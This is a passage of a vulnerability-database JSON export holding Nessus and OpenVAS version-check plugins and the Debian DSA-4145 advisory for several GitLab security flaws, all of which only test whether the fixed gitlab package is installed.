value:\"https://www.debian.org/security/2018/dsa-4145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gitlab packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 8.13.11+dfsg1-8+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"gitlab\", reference:\"8.13.11+dfsg1-8+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-4145-1 : gitlab - security update", "type": "nessus", "viewCount": 4}, "differentElements": ["modified"], "edition": 12, "lastseen": "2019-10-28T20:07:08"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:debian:debian_linux:gitlab", "cpe:/o:debian:debian_linux:9.0"], "cvelist": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Several vulnerabilities have been discovered in Gitlab, a software platform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710 Arbitrary code execution in project import.\n\n - CVE-2017-0916 Command injection via Webhooks.\n\n - CVE-2017-0917 Cross-site scripting in CI job output.\n\n - CVE-2017-0918 Insufficient restriction of CI runner for project cache access.\n\n - CVE-2017-0925 Information disclosure in Services API.\n\n - CVE-2017-0926 Restrictions for disabled OAuth providers could be bypassed.", "edition": 6, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": 
"0120058a6f27ed038fb34981841a393e1b02f13d0cdb984215f564a4a1abced3", "hashmap": [{"hash": "6345a07519080def10bf765f22c5b146", "key": "description"}, {"hash": "353d91f2df442080de42f503ab3f278a", "key": "pluginID"}, {"hash": "5ba3c9d875bfe1d4088cbfd233ef0c85", "key": "modified"}, {"hash": "d0083786fa4896023b7e89b86eaea16e", "key": "sourceData"}, {"hash": "6b7d85728983a5229fdfdc41c6b30a78", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "fa07a5338e88503fd255af6837f9bb02", "key": "cvelist"}, {"hash": "b5f4279a86e8ad7e7d5cdcfce85f13b7", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3f9580fb30f5ae7e1d8713dad8807aa6", "key": "cpe"}, {"hash": "76e8782b29cfd39782ffd31ec97c3583", "key": "published"}, {"hash": "ceec059fe53d22b2aa62a742623bc8e1", "key": "href"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=108422", "id": "DEBIAN_DSA-4145.NASL", "lastseen": "2018-08-30T19:57:29", "modified": "2018-04-18T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "108422", "published": "2018-03-19T00:00:00", "references": ["http://www.debian.org/security/2018/dsa-4145", "https://security-tracker.debian.org/tracker/CVE-2018-3710", "https://security-tracker.debian.org/tracker/CVE-2017-0925", "https://security-tracker.debian.org/tracker/CVE-2017-0918", "https://security-tracker.debian.org/tracker/CVE-2017-0926", "https://security-tracker.debian.org/tracker/CVE-2017-0916", "https://packages.debian.org/source/stretch/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0915", "https://security-tracker.debian.org/tracker/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0917"], "reporter": "Tenable", 
"sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4145. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108422);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/04/18 11:50:33\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_xref(name:\"DSA\", value:\"4145\");\n\n script_name(english:\"Debian DSA-4145-1 : gitlab - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-3710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0917\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2018/dsa-4145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gitlab packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 8.13.11+dfsg1-8+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 
(!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"gitlab\", reference:\"8.13.11+dfsg1-8+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-4145-1 : gitlab - security update", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss", "modified", "sourceData"], "edition": 6, "lastseen": "2018-08-30T19:57:29"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:debian:debian_linux:gitlab", "cpe:/o:debian:debian_linux:9.0"], "cvelist": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Several vulnerabilities have been discovered in Gitlab, a software platform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710 Arbitrary code execution in project import.\n\n - CVE-2017-0916 Command injection via Webhooks.\n\n - CVE-2017-0917 Cross-site scripting in CI job output.\n\n - CVE-2017-0918 Insufficient restriction of CI runner for project cache access.\n\n - CVE-2017-0925 Information disclosure in Services API.\n\n - CVE-2017-0926 Restrictions for disabled OAuth providers could be bypassed.", "edition": 1, "enchantments": {"score": {"modified": "2018-03-20T03:37:56", "value": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N/"}}, "hash": "2a6e269412a456c6174d216d62cfad928552e38b0cc7b352f38a494f6cc178b2", "hashmap": [{"hash": "6345a07519080def10bf765f22c5b146", "key": "description"}, {"hash": "353d91f2df442080de42f503ab3f278a", "key": "pluginID"}, {"hash": "6b7d85728983a5229fdfdc41c6b30a78", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": 
"fa07a5338e88503fd255af6837f9bb02", "key": "cvelist"}, {"hash": "76e8782b29cfd39782ffd31ec97c3583", "key": "modified"}, {"hash": "b5f4279a86e8ad7e7d5cdcfce85f13b7", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3f9580fb30f5ae7e1d8713dad8807aa6", "key": "cpe"}, {"hash": "992a68eea9ae6939e61b0ec63b778a0c", "key": "sourceData"}, {"hash": "76e8782b29cfd39782ffd31ec97c3583", "key": "published"}, {"hash": "ceec059fe53d22b2aa62a742623bc8e1", "key": "href"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=108422", "id": "DEBIAN_DSA-4145.NASL", "lastseen": "2018-03-20T03:37:56", "modified": "2018-03-19T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "108422", "published": "2018-03-19T00:00:00", "references": ["http://www.debian.org/security/2018/dsa-4145", "https://security-tracker.debian.org/tracker/CVE-2018-3710", "https://security-tracker.debian.org/tracker/CVE-2017-0925", "https://security-tracker.debian.org/tracker/CVE-2017-0918", "https://security-tracker.debian.org/tracker/CVE-2017-0926", "https://security-tracker.debian.org/tracker/CVE-2017-0916", "https://packages.debian.org/source/stretch/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0915", "https://security-tracker.debian.org/tracker/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0917"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4145. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108422);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/03/19 16:26:29\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_xref(name:\"DSA\", value:\"4145\");\n\n script_name(english:\"Debian DSA-4145-1 : gitlab - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-3710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2017-0925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2018/dsa-4145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gitlab packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 8.13.11+dfsg1-8+deb9u1.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", 
prefix:\"gitlab\", reference:\"8.13.11+dfsg1-8+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-4145-1 : gitlab - security update", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2018-03-20T03:37:56"}], "edition": 14, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "3f9580fb30f5ae7e1d8713dad8807aa6"}, {"key": "cvelist", "hash": "fa07a5338e88503fd255af6837f9bb02"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "description", "hash": "94e682f572219e238e994f47a76a97b6"}, {"key": "href", "hash": "e88870015da22affb99f52db5769bb53"}, {"key": "modified", "hash": "5a7504dfe859a7ccbaf560628f6442ad"}, {"key": "naslFamily", "hash": "74562d71b087df9eabd0c21f99b132cc"}, {"key": "pluginID", "hash": "353d91f2df442080de42f503ab3f278a"}, {"key": "published", "hash": "76e8782b29cfd39782ffd31ec97c3583"}, {"key": "references", "hash": "a088969e3ffa3a71ffb3ea0f49ec5460"}, {"key": "reporter", "hash": "205fa18cac3fc8ebbd32824afb096581"}, {"key": "sourceData", "hash": "dad3bf4df09046812026f13c33e8f983"}, {"key": "title", "hash": "b5f4279a86e8ad7e7d5cdcfce85f13b7"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "f0825fc31f1a71713baef07a65e6e7b7bd8deaa016f067bff66fd5c775ef4767", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DSA-4145-1:42E35"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704145"]}, {"type": "cve", "idList": ["CVE-2017-0925", "CVE-2017-0916", "CVE-2017-0915", "CVE-2017-0917", "CVE-2017-0918", "CVE-2017-0926", "CVE-2018-3710"]}, {"type": "freebsd", "idList": ["65FAB89F-2231-46DB-8541-978F4E87F32A"]}, {"type": "nessus", "idList": 
["FREEBSD_PKG_65FAB89F223146DB8541978F4E87F32A.NASL"]}, {"type": "hackerone", "idList": ["H1:298873", "H1:299473", "H1:301432"]}], "modified": "2019-12-13T06:53:31"}, "score": {"value": 6.8, "vector": "NONE", "modified": "2019-12-13T06:53:31"}, "vulnersScore": 6.8}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4145. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108422);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/13 12:30:46\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_xref(name:\"DSA\", value:\"4145\");\n\n script_name(english:\"Debian DSA-4145-1 : gitlab - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2018-3710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gitlab packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 8.13.11+dfsg1-8+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"gitlab\", reference:\"8.13.11+dfsg1-8+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "pluginID": "108422", "cpe": ["p-cpe:/a:debian:debian_linux:gitlab", "cpe:/o:debian:debian_linux:9.0"], "scheme": null}
{"openvas": [{"lastseen": "2019-07-04T18:56:09", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code:\n\nCVE-2017-0915 / CVE-2018-3710\nArbitrary code execution in project import.\n\nCVE-2017-0916\nCommand injection via Webhooks.\n\nCVE-2017-0917\nCross-site scripting in CI job output.\n\nCVE-2017-0918\nInsufficient restriction of CI runner for project cache access.\n\nCVE-2017-0925\nInformation disclosure in Services API.\n\nCVE-2017-0926\nRestrictions for disabled OAuth providers could be bypassed.", "modified": "2019-07-04T00:00:00", "published": "2018-03-18T00:00:00", "id": "OPENVAS:1361412562310704145", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704145", "title": "Debian Security Advisory DSA 4145-1 (gitlab - security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4145-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704145\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_name(\"Debian Security Advisory DSA 4145-1 (gitlab - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-18 00:00:00 +0100 (Sun, 18 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4145.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"gitlab on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 8.13.11+dfsg1-8+deb9u1.\n\nWe recommend that you upgrade your gitlab packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/gitlab\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have 
been discovered in Gitlab, a software\nplatform to collaborate on code:\n\nCVE-2017-0915 / CVE-2018-3710\nArbitrary code execution in project import.\n\nCVE-2017-0916\nCommand injection via Webhooks.\n\nCVE-2017-0917\nCross-site scripting in CI job output.\n\nCVE-2017-0918\nInsufficient restriction of CI runner for project cache access.\n\nCVE-2017-0925\nInformation disclosure in Services API.\n\nCVE-2017-0926\nRestrictions for disabled OAuth providers could be bypassed.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"gitlab\", ver:\"8.13.11+dfsg1-8+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:22:16", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4145-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nMarch 18, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : gitlab\nCVE ID : CVE-2017-0915 CVE-2017-0916 CVE-2017-0917 CVE-2017-0918 \n CVE-2017-0925 CVE-2017-0926 CVE-2018-3710\n\nSeveral vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code:\n\nCVE-2017-0915 / CVE-2018-3710\n\n Arbitrary code execution in project import.\n\nCVE-2017-0916\n\n Command injection via Webhooks.\n\nCVE-2017-0917\n\n Cross-site scripting in CI job output.\n\nCVE-2017-0918\n\n Insufficient restriction of CI runner for project cache access.\n\nCVE-2017-0925\n\n Information disclosure in Services API.\n\nCVE-2017-0926\n\n 
